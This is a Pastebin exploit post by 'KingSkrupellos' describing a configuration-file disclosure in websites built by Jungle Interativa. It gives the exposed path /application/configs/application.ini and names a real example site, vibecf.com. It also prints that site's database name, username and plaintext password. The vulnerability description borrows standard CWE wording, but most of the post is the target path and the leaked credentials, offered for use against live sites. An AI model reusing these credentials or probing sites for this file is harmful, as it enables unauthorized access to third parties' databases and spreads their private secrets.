Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : Jungle Interativa Database Configuration Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 29/03/2019
- # Vendor Homepage : novo.jungleclientes.com.br
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-16 [ Configuration ]
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Impact :
- ***********
- * Site by Jungle Interativa configuration file may potentially disclose sensitive information to remote attackers.
- The configuration file stored in /application/configs/application.ini
- HTTP requests consisting of a single character will cause the software to disclose sensitive
- configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration file
- also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- * The product stores sensitive information in files or directories that are accessible to actors
- outside of the intended control sphere.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- ############################################################################################
- # Database Configuration File Disclosure Exploit :
- *******************************************
- /application/configs/application.ini
- ###########################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] vibecf.com/application/configs/application.ini
- resources.multidb.name1.adapter = pdo_mysql
- resources.multidb.name1.dbname = vibecf_site
- resources.multidb.name1.username = vibecf_site
- resources.multidb.name1.password = "+!o[4lWXf{Cb"
- resources.multidb.name1.host = "localhost"
- resources.multidb.name1.default = true
- resources.multidb.name1.charset = "utf8"
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Add Comment
Please, Sign In to add comment